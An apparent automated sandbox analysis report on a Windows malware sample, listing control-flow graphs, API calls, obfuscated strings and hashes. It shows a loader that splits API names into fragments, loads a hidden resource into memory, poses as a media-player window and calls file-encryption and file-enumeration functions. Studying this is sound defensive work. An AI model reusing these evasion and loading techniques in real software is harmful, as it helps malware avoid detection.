401b26 12982->12987 12983->12981 12984->12982 12985->12987 12986 401b56 12988 401b86 12986->12988 12990 401b8d ??3@YAXPAX 12986->12990 12987->12986 12989 401b5d ??3@YAXPAX 12987->12989 12991 401bb9 12988->12991 12992 401bcd ??3@YAXPAX 12988->12992 12989->12986 12990->12988 12992->12991 12993->12969 12994 401210 malloc 12993->12994 12995 40122c 12994->12995 12995->12969 12996->12971 12998 4012e0 12996->12998 12997 4014d1 12997->12971 12998->12997 12999 40136e 22 API calls 12998->12999 12999->12998 13000 4014b8 12999->13000 13000->12971 14037 2678808 14041 2678810 14037->14041 14038 26788eb CreateFileW 14039 26788b8 14038->14039 14038->14041 14040 2674190 GetPEB 14040->14041 14041->14038 14041->14039 14041->14040 14042 26740f0 GetPEB 14041->14042 14042->14041

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 401600-40162e LoadLibraryA GetProcAddress EncryptFileA 1 401630-40163c 0->1 2 40163f-40185c ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z * 2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z LoadLibraryA GetProcAddress * 2 LdrFindResource_U 0->2 3 401878-4018c1 VirtualAlloc call 40100a call 401019 2->3 4 40185e-401872 LdrAccessResource 2->4 8 4018c6-4018db 3->8 4->3 10 4018e1-40195c LoadIconA LoadCursorA GetStockObject RegisterClassA 8->10 11 4019d3-401a3a CreateWindowExA ShowWindow UpdateWindow GetMessageA 8->11 10->11 12 40195e-4019d0 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z * 8 10->12 13 401a3c-401a42 11->13 14 401a6d-401a89 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z 11->14 15 401a48-401a6b TranslateMessage DispatchMessageA GetMessageA 13->15 16 401aa7-401ab9 14->16 17 401a8b-401a90 14->17 15->14 15->15 20 401ad7-401ae9 16->20 21 401abb-401ac0 16->21 18 401a92-401a94 17->18 19 401a9d-401aa4 ??3@YAXPAX@Z 17->19 18->19 24 401a96-401a9b 18->24 19->16 22 401b07-401b19 20->22 23 401aeb-401af0 20->23 25 401ac2-401ac4 21->25 26 401acd-401ad4 ??3@YAXPAX@Z 21->26 29 401b37-401b49 22->29 30 401b1b-401b20 22->30 27 401af2-401af4 23->27 28 401afd-401b04 ??3@YAXPAX@Z 23->28 24->16 25->26 31 401ac6-401acb 25->31 26->20 27->28 32 401af6-401afb 27->32 28->22 35 401b67-401b79 29->35 36 401b4b-401b50 29->36 33 401b22-401b24 30->33 34 401b2d-401b34 ??3@YAXPAX@Z 30->34 31->20 32->22 33->34 39 401b26-401b2b 33->39 34->29 37 401b97-401bac 35->37 38 401b7b-401b80 35->38 40 401b52-401b54 36->40 41 401b5d-401b64 ??3@YAXPAX@Z 36->41 44 401bd7-401be3 37->44 45 401bae-401bb3 37->45 42 401b82-401b84 38->42 43 401b8d-401b94 ??3@YAXPAX@Z 38->43 39->29 40->41 46 401b56-401b5b 40->46 41->35 42->43 47 401b86-401b8b 42->47 43->37 48 401bb5-401bb7 45->48 49 401bcd-401bd4 ??3@YAXPAX@Z 45->49 46->35 47->37 48->49 50 401bb9-401bca 48->50 49->44
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(Advapi32.dll,EncryptFileA), ref: 0040161A
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401623
                                                                                      • EncryptFileA.ADVAPI32(C:\Windows\Setup\State\State.ini), ref: 0040162A
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60 ref: 0040167D
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(LdrFin), ref: 0040169F
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 004016B2
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(dReso), ref: 004016D1
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 004016E4
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(urce_U), ref: 00401703
                                                                                      • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?), ref: 00401723
                                                                                      • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401731
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401742
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401755
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(Ldr), ref: 00401774
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401787
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(Acces), ref: 004017A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1305693753.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1305662841.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305718639.0000000000405000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000407000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000474000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$Tidy@?$basic_string@$?assign@?$basic_string@V12@$D@2@@0@Hstd@@V10@0@V?$basic_string@$AddressEncryptFileLibraryLoadProc
                                                                                      • String ID: Acces$Advapi32.dll$C:\Windows\Setup\State\State.ini$EncryptFileA$GIh@36E#YEA1tFmFqw44wMs%bm^9R?qzDkkk^Ht+tywp2T&M8aVQ1wu#c<eCQglgS+m&KyvZQb_x!tLZTbzSj4!?m$5vwsutammbhRsGHUifpf$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$WMPlayerWindowEditor$Windows Media Player HWND Editor$dReso$ntdll.dll$sResource$urce_U
                                                                                      • API String ID: 3516244591-712066751
                                                                                      • Opcode ID: f8c8bf3419da7efc3c2f758ebdd38b7438056af9a9bfe9611bd3ddaf80b0cfcc
                                                                                      • Instruction ID: dce9f58f7b180b880584391d3317b87618375bb0fe771e7de301abb772954e00
                                                                                      • Opcode Fuzzy Hash: f8c8bf3419da7efc3c2f758ebdd38b7438056af9a9bfe9611bd3ddaf80b0cfcc
                                                                                      • Instruction Fuzzy Hash: FDF1E4711183809FD324DF60CC49BAFBBA4EB84310F40493EF586632D1EBB99909CB5A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 59 2611030-2611075 LoadLibraryW GetProcAddress call 2611b30 62 2611077-2611079 59->62 63 261107e-261108f 59->63 64 261148d-2611490 62->64 65 2611091-261109e SetLastError 63->65 66 26110a3-26110be call 2611b30 63->66 65->64 69 26110c0-26110c2 66->69 70 26110c7-26110dc 66->70 69->64 71 26110f0-26110fd 70->71 72 26110de-26110eb SetLastError 70->72 73 2611111-261111a 71->73 74 26110ff-261110c SetLastError 71->74 72->64 75 261111c-2611129 SetLastError 73->75 76 261112e-261114f 73->76 74->64 75->64 77 2611163-261116d 76->77 78 26111a5-26111d5 GetNativeSystemInfo call 26118d0 * 2 77->78 79 261116f-2611176 77->79 90 26111d7-26111e4 SetLastError 78->90 91 26111e9-261120c call 2611800 78->91 80 2611186-2611192 79->80 81 2611178-2611184 79->81 83 2611195-261119b 80->83 81->83 85 26111a3 83->85 86 261119d-26111a0 83->86 85->77 86->85 90->64 93 261123d-2611255 GetProcessHeap RtlAllocateHeap 91->93 94 261120e-261121f call 2611800 91->94 95 2611257-2611276 SetLastError 93->95 96 261127b-2611291 93->96 97 2611222-261122c 94->97 95->64 98 2611293-261129a 96->98 99 261129c 96->99 97->93 100 261122e-2611238 SetLastError 97->100 102 26112a3-2611300 call 2611b30 98->102 99->102 100->64 105 2611302 102->105 106 2611307-2611370 call 2611800 call 2611980 call 2611b50 102->106 107 261147f-261148b call 26116c0 105->107 115 2611372 106->115 116 2611377-2611388 106->116 107->64 115->107 117 26113a2-26113a5 116->117 118 261138a-26113a0 call 2612090 116->118 119 26113ac-26113ba call 26121a0 117->119 118->119 124 26113c1-26113c5 call 2611e80 119->124 125 26113bc 119->125 127 26113ca-26113cf 124->127 125->107 128 26113d1 127->128 129 26113d6-26113e4 call 2612010 127->129 128->107 132 26113e6 129->132 133 26113eb-26113f4 129->133 132->107 134 2611470-2611473 133->134 135 26113f6-26113fd 133->135 136 261147a-261147d 134->136 137 261145d-261146b 135->137 138 26113ff-261145b GetPEB 135->138 136->64 139 261146e 137->139 138->139 139->136
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(02614054,02614040), ref: 02611047
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0261104E
                                                                                        • Part of subcall function 02611B30: SetLastError.KERNEL32(0000000D,?,02611070,?,00000040), ref: 02611B3D
                                                                                      • SetLastError.KERNEL32(000000C1), ref: 02611096
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306220984.0000000002611000.00000020.00001000.00020000.00000000.sdmp, Offset: 02611000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2611000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                      • String ID:
                                                                                      • API String ID: 1866314245-0
                                                                                      • Opcode ID: fabd02dca7b0b06edc4e9eef99e1759a9626acf4588b548c8df596add21ab645
                                                                                      • Instruction ID: 3b33d807adcdcb60b5f97059448a308e0996b19db6a1cf23b5c4d5b2f05d2f87
                                                                                      • Opcode Fuzzy Hash: fabd02dca7b0b06edc4e9eef99e1759a9626acf4588b548c8df596add21ab645
                                                                                      • Instruction Fuzzy Hash: 29F107B4E00209EFDB04CF94D981BAEB7B1BF49305F248599EA09AB341D730EA51DF90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 144 2675390-26753a7 145 26753ac 144->145 146 26753b0-26753b6 145->146 147 267556e-2675574 146->147 148 26753bc 146->148 149 267557a 147->149 150 2675698-267569e 147->150 151 26753c2-26753c8 148->151 152 26754ec-26754f3 148->152 155 2675580-2675586 149->155 156 267562e-2675635 149->156 159 26756a4-26756b7 150->159 160 267555d-2675563 150->160 157 2675426-267542c 151->157 158 26753ca 151->158 153 26754f5-267550b call 2674190 call 26740f0 152->153 154 2675510-267553a 152->154 153->154 195 2675557 154->195 196 267553c-2675552 call 2674190 call 26740f0 154->196 164 267559a-26755a1 155->164 165 2675588-267558e 155->165 170 2675637-267564d call 2674190 call 26740f0 156->170 171 2675652-267565d 156->171 166 2675480-2675487 157->166 167 267542e-2675434 157->167 168 26753d0-26753d6 158->168 169 26756bc-26756c3 158->169 159->146 161 267570e-2675715 160->161 162 2675569 160->162 162->145 179 26755a3-26755b9 call 2674190 call 26740f0 164->179 180 26755be-26755e0 164->180 165->160 175 2675590-2675595 165->175 172 26754a4-26754af 166->172 173 2675489-267549f call 2674190 call 26740f0 166->173 167->160 176 267543a-2675441 167->176 177 26753f2-26753f9 168->177 178 26753d8-26753de 168->178 183 26756c5-26756db call 2674190 call 26740f0 169->183 184 26756e0-26756eb 169->184 170->171 199 267565f-2675675 call 2674190 call 26740f0 171->199 200 267567a-2675688 RtlAllocateHeap 171->200 215 26754b1-26754c7 call 2674190 call 26740f0 172->215 216 26754cc-26754e7 172->216 173->172 175->146 193 2675443-2675459 call 2674190 call 26740f0 176->193 194 267545e-267547b 176->194 189 2675416-2675419 177->189 190 26753fb-2675411 call 2674190 call 26740f0 177->190 178->160 187 26753e4-26753f0 call 2674570 178->187 179->180 221 26755e6-26755ed 180->221 222 267541f-2675424 180->222 183->184 223 26756ed-2675703 call 2674190 call 26740f0 184->223 224 2675708-267570c RtlFreeHeap 184->224 187->145 189->222 190->189 193->194 194->145 195->160 196->195 199->200 200->161 214 267568e-2675693 200->214 214->145 215->216 216->145 235 26755ef-2675605 call 2674190 call 26740f0 221->235 236 267560a-2675629 221->236 222->145 223->224 224->161 235->236 236->146
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,?,?,?,?,02678CFA), ref: 02675682
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,02678CFA), ref: 0267570C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateFree
                                                                                      • String ID: p^sw$12$12$12$J`
                                                                                      • API String ID: 2488874121-2896302409
                                                                                      • Opcode ID: d18958be94c75a276282220b4c4e7a237814c3e7af60f54e2f83b295d59b2804
                                                                                      • Instruction ID: 754a80d2ad1e5c59a840aa438ea619a7e2f651cfd447ba19038661d59d389259
                                                                                      • Opcode Fuzzy Hash: d18958be94c75a276282220b4c4e7a237814c3e7af60f54e2f83b295d59b2804
                                                                                      • Instruction Fuzzy Hash: DF81D031F44241CBDB18AB79BC9472E36E2AB84644F8108BDEC16EB390EF65CC548F95

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 257 2678330-267843a 258 2678442-2678447 257->258 259 2678450-2678456 258->259 260 2678646-267864c 259->260 261 267845c 259->261 264 267864e-2678654 260->264 265 26786ac-26786b1 260->265 262 2678462-2678468 261->262 263 26785fe-2678641 call 267baa0 261->263 267 267846e-2678474 262->267 268 267854d-2678561 call 26735f0 262->268 263->259 269 26786b6-26786bd 264->269 270 2678656-267865c 264->270 265->259 274 2678476-267847c 267->274 275 26784de-2678515 267->275 291 2678563-267857b call 2674190 call 26740f0 268->291 292 2678581-26785a9 268->292 272 26786bf-26786d5 call 2674190 call 26740f0 269->272 273 26786da 269->273 277 2678693-2678699 270->277 278 267865e-2678665 270->278 272->273 294 26786dd-26786e9 273->294 274->277 283 2678482-267848a 274->283 279 2678517-267852d call 2674190 call 26740f0 275->279 280 2678532-2678548 SetFileInformationByHandle 275->280 277->259 281 267869f-26786ab 277->281 285 2678667-267867d call 2674190 call 26740f0 278->285 286 2678682-267868e 278->286 279->280 280->259 289 267848c-26784a4 call 2674190 call 26740f0 283->289 290 26784aa-26784ce CreateFileW 283->290 285->286 286->259 289->290 290->294 300 26784d4-26784d9 290->300 291->292 308 26785c6-26785d1 292->308 309 26785ab-26785c1 call 2674190 call 26740f0 292->309 300->259 320 26785d3-26785e9 call 2674190 call 26740f0 308->320 321 26785ee-26785f9 308->321 309->308 320->321 321->258
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,000001C3,00000000,?,38CFF007,?,?), ref: 026784C7
                                                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0267853C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateHandleInformation
                                                                                      • String ID: @$iL`2$iL`2$12$V^!
                                                                                      • API String ID: 3667790775-1221398831
                                                                                      • Opcode ID: 8a77d4cb43b386f2707c37d5fb8fadee430cd554997de8d92f24c28af5d696ed
                                                                                      • Instruction ID: 8b53d6a02bc7b653d52b5ffbbcae5c8077bba863b88735e1bf68b4f5d86c5c1d
                                                                                      • Opcode Fuzzy Hash: 8a77d4cb43b386f2707c37d5fb8fadee430cd554997de8d92f24c28af5d696ed
                                                                                      • Instruction Fuzzy Hash: 60915D71A083019FD718DF68A99862FBBE5AFC4304F104D2DF44A9B390EB75C9498F96

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 328 2673a20-2673a3b 329 2673a40-2673a45 328->329 330 2673bce-2673bd3 329->330 331 2673a4b 329->331 332 2673bd5-2673bda 330->332 333 2673bfc-2673c0f call 26735f0 330->333 334 2673a51-2673a56 331->334 335 2673b8f-2673b96 331->335 336 2673be6-2673beb 332->336 337 2673bdc-2673be1 332->337 355 2673c11-2673c27 call 2674190 call 26740f0 333->355 356 2673c2c-2673c47 333->356 339 2673ca0-2673ca7 334->339 340 2673a5c-2673a61 334->340 341 2673bb3-2673bc9 FindNextFileW 335->341 342 2673b98-2673bae call 2674190 call 26740f0 335->342 336->329 345 2673bf1-2673bfb 336->345 337->329 343 2673cc4-2673cc5 FindClose 339->343 344 2673ca9-2673cbf call 2674190 call 26740f0 339->344 347 2673b47-2673b4e 340->347 348 2673a67-2673a6c 340->348 341->329 342->341 354 2673cc7-2673cd1 343->354 344->343 352 2673b50-2673b66 call 2674190 call 26740f0 347->352 353 2673b6b-2673b7f FindFirstFileW 347->353 348->336 357 2673a72-2673a77 348->357 352->353 353->354 361 2673b85-2673b8a 353->361 355->356 374 2673c64-2673c6f 356->374 375 2673c49-2673c5f call 2674190 call 26740f0 356->375 363 2673b21-2673b42 357->363 364 2673a7d-2673a83 357->364 361->329 363->329 370 2673a85-2673a8d 364->370 371 2673aa4-2673aa6 364->371 372 2673a9d-2673aa2 370->372 380 2673a8f-2673a93 370->380 371->372 373 2673aa8-2673abb call 26735f0 371->373 372->329 389 2673abd-2673ad3 call 2674190 call 26740f0 373->389 390 2673ad8-2673b08 call 2673a20 373->390 392 2673c71-2673c87 call 2674190 call 26740f0 374->392 393 2673c8c-2673c9b 374->393 375->374 380->371 382 2673a95-2673a9b 380->382 382->371 382->372 389->390 406 2673b0d-2673b1c call 2673590 390->406 392->393 393->329 406->329
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 02673B78
                                                                                      • FindNextFileW.KERNELBASE(?,?), ref: 02673BB9
                                                                                      • FindClose.KERNELBASE(?), ref: 02673CC5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID: .$HUE($HUE($12
                                                                                      • API String ID: 3541575487-884143723
                                                                                      • Opcode ID: 0f929f8a107fadaff842d698a85d666bab7afd2741f67105765e47d383f89a3e
                                                                                      • Instruction ID: 722bcfb507c4970d36294cd435ecf5379051ac4b39d77b9f8b2f1dda289f3a6d
                                                                                      • Opcode Fuzzy Hash: 0f929f8a107fadaff842d698a85d666bab7afd2741f67105765e47d383f89a3e
                                                                                      • Instruction Fuzzy Hash: 8E51F671B442418BC728EB78B889B7F77E69F90600F004D6DE546CB341EF36C865AB96

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 409 26786f0-2678806 410 2678810-2678816 409->410 411 2678950-2678956 410->411 412 267881c 410->412 413 26789a0-26789e8 call 267baa0 411->413 414 2678958-267895e 411->414 415 2678822-2678828 412->415 416 267891b-2678922 412->416 430 26788b8-26788c2 413->430 440 26789ee 413->440 417 2678964-267896b 414->417 418 26788ac-26788b2 414->418 421 26788c3-26788cb 415->421 422 267882e-2678834 415->422 419 2678924-267893a call 2674190 call 26740f0 416->419 420 267893f-267894b 416->420 424 267896d-2678983 call 2674190 call 26740f0 417->424 425 2678988-267899b 417->425 418->410 418->430 419->420 420->410 431 26788cd-26788e5 call 2674190 call 26740f0 421->431 432 26788eb-267890f CreateFileW 421->432 427 2678836-267883c 422->427 428 2678845-267884c 422->428 424->425 425->410 427->418 437 267883e-2678843 427->437 438 267884e-2678864 call 2674190 call 26740f0 428->438 439 2678869-267888c 428->439 431->432 432->430 435 2678911-2678916 432->435 435->410 437->410 438->439 456 267888e-26788a4 call 2674190 call 26740f0 439->456 457 26788a9 439->457 447 26789f0-26789f2 440->447 448 26789f8-2678a05 440->448 447->430 447->448 456->457 457->418
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000), ref: 02678908
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID: [i$V^!$x*
                                                                                      • API String ID: 823142352-1411442858
                                                                                      • Opcode ID: f97c1338fac7f4f2a4e84018aca0efa12311935f85353153c2251fd893bd11b5
                                                                                      • Instruction ID: 0316353f96255376b8a7646cf184e84195c01fa9db5f2ae9e56f1fd0d1237127
                                                                                      • Opcode Fuzzy Hash: f97c1338fac7f4f2a4e84018aca0efa12311935f85353153c2251fd893bd11b5
                                                                                      • Instruction Fuzzy Hash: 22716E71A083419FD708DF29E848A2FBBE5ABC4314F048D1DE4A99B390D7749D49CF86

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 51 401019-4012fe 53 4014d1-4014db 51->53 54 401304-40131a 51->54 55 401320-4014b2 call 401560 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z * 2 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z * 2 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z 54->55 58 4014b8-4014d0 55->58
                                                                                      APIs
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4,00000343,022C2598), ref: 00401398
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040139B
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013AC
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013AF
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013C1
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013C4
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,6EA4A3D8,004059A4), ref: 004013D9
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013EA
